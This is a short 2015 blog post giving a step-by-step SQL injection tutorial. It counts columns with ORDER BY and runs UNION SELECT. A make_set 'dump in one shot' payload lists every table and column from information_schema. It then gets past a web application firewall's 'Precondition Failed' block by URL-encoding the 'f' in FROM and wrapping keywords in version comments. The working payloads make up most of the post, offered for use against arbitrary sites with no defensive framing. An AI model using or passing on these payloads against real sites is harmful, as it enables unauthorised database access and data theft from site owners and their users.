Saturday, April 25, 2015

How To ByPass Precondition Failed In SQL injection



~~~~~~~~~~~~~With The Name Of ALLAH~~~~~~~~~~~~~~~~~~~~


Today we will Learn how to by Pass Precondition Failed in SQLI ..

Steps ::::

Lets Assume !!! :::

1-
www.site.com/php?id=1 order by 4--
2-
    www.site.com/php?id=-1 union select 1,2,3 --
  3-
    For example  2 is vlunerable Column::
now Going To perform Dios !!

4-
     www.site.com/php?id=-1 union select 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,
0x3c6c693e,table_name,column_name)),@),3--

 Now Suppose It is showing us  Precondition Failed  


WAF byPass Method








----------------------------------------------------------------------------------------------------------------------
5-
  I test such Error  many Time ... When i Encode First character of  From Like that %66rom
it Works and Gives me Result ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

6-
 http://site.com/portfolio-detail.php?id=-11+ UNION SELECT 1,2,3,make_set(6,@:=0x0a,(/*!50000select*/(1) %66rom (/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@),5,6,7,8,9


We Have SuccessFully Bypassed This Precondition Failed WAF

Precondition Failed bypass













   :::::::::::::::::::::::::::::::Watch On Youtube::::::::::::::::::::::::::::::::::::::



------------------------------------------------------------------------------------------------------------------

AuthoR ::: MasOOD (Afghani)

No comments:

Post a Comment